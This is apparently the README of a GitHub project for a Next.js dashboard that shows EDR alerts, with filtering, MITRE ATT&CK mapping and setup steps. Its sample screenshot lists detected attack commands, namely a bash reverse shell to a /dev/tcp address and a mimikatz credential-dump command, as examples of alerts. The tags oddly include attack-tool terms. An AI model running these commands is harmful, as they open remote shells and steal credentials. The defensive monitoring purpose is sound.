forgehk/darkforge-edr-dashboard
GitHub: forgehk/darkforge-edr-dashboard
一个基于Next.js 14的darkforge-edr告警仪表板,提供实时监控、MITRE ATT&CK映射和规则分析功能。
Stars: 0 | Forks: 0
# darkforge EDR 仪表板
[]() []() [](LICENSE)
## 功能简介
`darkforge-edr` 以 JSON-lines 格式将告警写入本地文件或 HTTP 收集器。本仪表盘读取该数据流并提供以下功能:
- **实时告警流** — 最新优先,按严重程度着色,点击可查看命令行/主机详情
- **筛选功能** — 按严重程度、规则名称、主机、时间范围筛选
- **MITRE ATT&CK 矩阵** — 每个告警的 `tags` 字段映射到具体技术;矩阵展示覆盖范围和频率
- **高频规则** — 显示触发最多的检测规则
- **进程树** — 针对任意告警,通过 `ppid` 链接重建父子进程链
- **确认状态** — 标记告警为已分析/已抑制(基于内存;需自行集成后端持久化)
## 截图
```
┌─ darkforge-edr dashboard ─────────────────────────────────────────────────┐
│ │
│ ┌─ severity ─────┐ ┌─ rule ──────────────────┐ ┌─ MITRE ATT&CK ─────┐ │
│ │ high 14 │ │ suspicious_shell 11 │ │ T1059 ████████ │ │
│ │ medium 7 │ │ ps_encoded_cmd 5 │ │ T1003 ██ │ │
│ │ low 3 │ │ lolbin_curl_pipe 4 │ │ T1053 █ │ │
│ └────────────────┘ └─────────────────────────┘ └────────────────────┘ │
│ │
│ recent alerts ──────────────────────────────────────────────────────── │
│ HIGH 08:42:11Z bash 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1' │
│ CRIT 08:38:02Z mimikatz 'mimikatz.exe sekurlsa::logonpasswords' │
│ HIGH 08:34:55Z powershell 'powershell.exe -enc QQB...' │
└────────────────────────────────────────────────────────────────────────────┘
```
## 与代理通信方式
两种模式:
1. **尾随文件** — `dfedr run --out alerts.jsonl` 写入本地文件;仪表盘通过 Next.js 路由处理器轮询该文件。
2. **HTTP 收集器** — `dfedr run --collector http://localhost:3000/api/alerts/ingest` 将每个告警 POST 到本项目的 Next.js 端点;仪表盘通过 Server-Sent Events 推送给订阅客户端。
本地开发/演示时,仓库内置了测试数据,可执行 `npm run dev` 无需运行代理即可查看带数据的仪表盘。
## 快速开始
```
git clone https://github.com/forgehk/darkforge-edr-dashboard
cd darkforge-edr-dashboard
npm install
npm run dev
open http://localhost:3000
```
然后在另一台机器(或本地笔记本)运行 EDR 代理并指向收集器:
```
dfedr run --rules rules.yaml --collector http://YOUR_LAPTOP_IP:3000/api/alerts/ingest
```
## 技术栈
- **Next.js 14 App Router** 搭配 React Server Components 实现告警表格。
- **Server-Sent Events** 实现实时告警流推送(相比 WebSocket 更适合仅需服务端→客户端的场景)。
- **Tailwind** 构建用户界面。
- **无后端数据库** — 告警存储在基于告警 ID 的内存环形缓冲区中。超出容量时可接入 Postgres / SQLite / Loki。
## 开发路线图
- [x] 带筛选功能的实时告警表格
- [x] MITRE ATT&CK 覆盖矩阵
- [x] 高频规则图表
- [x] Server-Sent Events 流推送
- [ ] 进程树重建视图
- [ ] 告警确认/分析状态(需后端持久化)
- [ ] 按主机分组告警
- [ ] 可插拔后端(Postgres, ClickHouse, Loki)
- [ ] 暗黑模式切换(当前默认深色模式)
## 许可协议
[MIT](LICENSE)
*由 [@forgehk](https://github.com/forgehk) 构建 — [DarkForge AI](https://darkforgeai.com)*
标签:AMSI绕过, darkforge-edr, MITRE ATT&CK 框架, Next.js 应用, TypeScript 项目, 事件响应工具, 入侵检测系统, 威胁检测, 安全数据湖, 安全监控仪表板, 安全运营, 实时警报系统, 扫描框架, 端点检测与响应, 网络安全, 脱壳工具, 自动化攻击, 规则管理, 过滤器功能, 隐私保护